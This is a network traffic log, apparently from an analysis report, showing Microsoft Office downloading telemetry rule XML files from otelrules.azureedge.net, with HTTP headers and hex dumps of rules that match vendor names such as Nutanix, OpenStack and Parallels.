2024-11-11 00:15:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 2a0e1455-801e-0035-741e-32752a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-15869dbbcc6khw88hC1DFWbb20000000074000000000cnm3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-16547b76f7fkj7j4hC1DFW0a9g0000000dcg0000000072t8 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:05 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:05 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 0394c067-a01e-0002-6160-325074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001505Z-15869dbbcc6xcpf8hC1DFWxtx00000000fq000000000a24h x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:05 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:05 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 804dbac4-701e-006f-2a2d-32afc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001505Z-15869dbbcc6tjwwhhC1DFWn22800000006r000000000a4uv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:05 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:05 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001505Z-16547b76f7f7rtshhC1DFWrtqn0000000db000000000hgb5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:05 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:05 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001505Z-16547b76f7fmbrhqhC1DFWkds80000000dgg000000001a7a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:05 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:05 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:05 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001505Z-16547b76f7f8dwtrhC1DFWd1zn0000000dcg00000000pmsd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:05 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:06 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-16547b76f7fcjqqhhC1DFWrrrc0000000dc0000000008agv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:06 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:06 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 32574dcc-101e-0079-7250-325913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-15869dbbcc6khw88hC1DFWbb20000000072000000000hpbt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-11 00:15:06 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:06 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 8b11e52e-a01e-000d-655f-2ed1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-15869dbbcc6pfq2ghC1DFWmp1400000006q00000000090qc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:06 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:06 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-16547b76f7f9rdn9hC1DFWfk7s0000000d8000000000py4d x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:06 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
